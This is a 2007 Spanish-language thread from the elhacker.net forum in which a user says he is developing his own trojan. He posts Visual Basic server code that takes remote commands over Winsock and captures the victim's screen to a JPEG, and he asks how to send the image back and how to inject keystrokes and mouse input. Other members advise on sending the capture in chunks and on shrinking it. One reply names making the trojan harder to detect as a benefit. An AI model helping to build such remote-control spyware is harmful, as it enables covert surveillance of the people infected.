elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda con mi troyano y capturar pantalla.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con mi troyano y capturar pantalla.  (Leído 2,277 veces)
ogcu

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Ayuda con mi troyano y capturar pantalla.
« en: 20 Octubre 2007, 22:17 »

Buenas a tardes a todos resulta que estoy desarrollando mi proio troyano, y me acabo de atascar en el siguiente problema al agregarle la funcion de captura pantalla.

Esto es lo que hago en Server:

Código:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error GoTo Error
Dim datos As String
Dim vDatos As Variant
ws.GetData datos
vDatos = Split(datos, "|")
Select Case vDatos(0)Case "Capturar_Pantalla"
 Dim captura As New cJpeg
 captura.SetSamplingFrequencies 2, 2, 2, 2, 2, 2
 captura.Quality = CInt(vDatos(1)) ' La calidad la mando desde el cliente
 captura.SampleScreen
 captura.SaveFile ("D:\" & "captura" & ".jpg") ' Lo guardo en D para localizarlo mejor 
End Select
Error:
End Sub

mi problema es que como haga para que al enviar por segunda vez sobreescriba la imagen anterior, ¿Como hago esa verificacion para ver si el archivo existe?, y si sobreescribirlo.

Otra cosa no se como enviar esa imagen al cliente y ponerlo en un imagebox?, ya si envio

Código:
ws.Sendata captura

Me da erro que no coinciden los tipos.

y aprovecho para decirles como envio pulsaciones de teclado y de mouse.
Gracias de antemano.


En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: Ayuda con mi troyano y capturar pantalla.
« Respuesta #1 en: 20 Octubre 2007, 22:45 »

yo en mi troyano lo q hice es q guarda la foto, la carga en un string, borra el archivo y manda la string...

para enviarla no te deja xq es muy pesada, la tenes q enviar por partes, si buscas en el foro hay post de estos, yo hice un manual... y hay varios mas...

para cargar la imagen en el image, la guardas en una ruta y despues pones

Código:
Image1.Picture = LoadPicture("aca la ruta entre comillas")

espero q te sirva, no te posteo el resto de los code xq toy apurado :S


En línea

ogcu

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Ayuda con mi troyano y capturar pantalla.
« Respuesta #2 en: 20 Octubre 2007, 22:57 »

Gracias vivachapas, estoy un poco asi que despues me pongo a trabajar en ello, Ahora me he dado cuenta de otra cosa, es normal que mi compu se alente un poco al hacer la imagen y gurdarla, ya se que se alenta como 10 segundos para volver a la normalidad, o alguna otra forma de capturar pantalla?

Gracias

mi compu tiene estas caracteristicas

Pentium IV 2.8
1 GB de ram
128 de video
y mas 50 Gb de espacio en disco.
En línea

HaDeS, -
WarZone Master

Desconectado Desconectado

Mensajes: 284



Ver Perfil WWW
Re: Ayuda con mi troyano y capturar pantalla.
« Respuesta #3 en: 21 Octubre 2007, 00:39 »

Checate este post donde se discutia acerca de la velocidad de ese modulo al convertir la imagen de un bmp a jpg.
http://foro.elhacker.net/index.php/topic,179087.0.html
por ahi anda un post donde podes variar el tamaño de la pantalla para que el modulo se demore menos.
que te sirva.

saludso ;)
En línea

ogcu

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Ayuda con mi troyano y capturar pantalla.
« Respuesta #4 en: 21 Octubre 2007, 06:17 »

Una duda leyen tu post el link que me diste Hades me he decidido por usar la funcio que devuelve el .png, pero una pregunta ¿De que dll's depende esta?, Que metodos me aconsejas vos.

Gracias de antemano.
En línea

HaDeS, -
WarZone Master

Desconectado Desconectado

Mensajes: 284



Ver Perfil WWW
Re: Ayuda con mi troyano y capturar pantalla.
« Respuesta #5 en: 21 Octubre 2007, 06:44 »

ps en si depende creo que de la libreria gdi32, te recomendaria que le echaras una mirada a el codigo que posteo LeandroA, si no te funciona como es o se demora en pasar de formato el archivo, podes tener como guia el codigo que postee yo (El que hace la toma de la pantalla y la hace mas chica) y lo combinas con el codigo del png, asi se podria lograr una combinacion perfecta para hacer la captura de pantalla.

saludos ;)
En línea

H4NG3R

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Ayuda con mi troyano y capturar pantalla.
« Respuesta #6 en: 21 Octubre 2007, 15:20 »

Yom lo que ago es simplement unauna vez tienes la pantalla capturada, la passo a bytes, como? En Vb ni idea xD, xo se k lo ago kn VB .NET i dudo k el codigo sea = aisi k busca por ahi . . .

Bueno ventajas: - Se envai mas rapido
                        - Evitas problema se sobresqribir
                         - Mas deificl de detectar el troyano
                         

Enga Salut!

H4NG3R
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Necesito troyano wifi que tome fotos de pantalla
Wireless en Windows
diego6969 1 545 Último mensaje 12 Junio 2020, 09:29
por rub'n
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines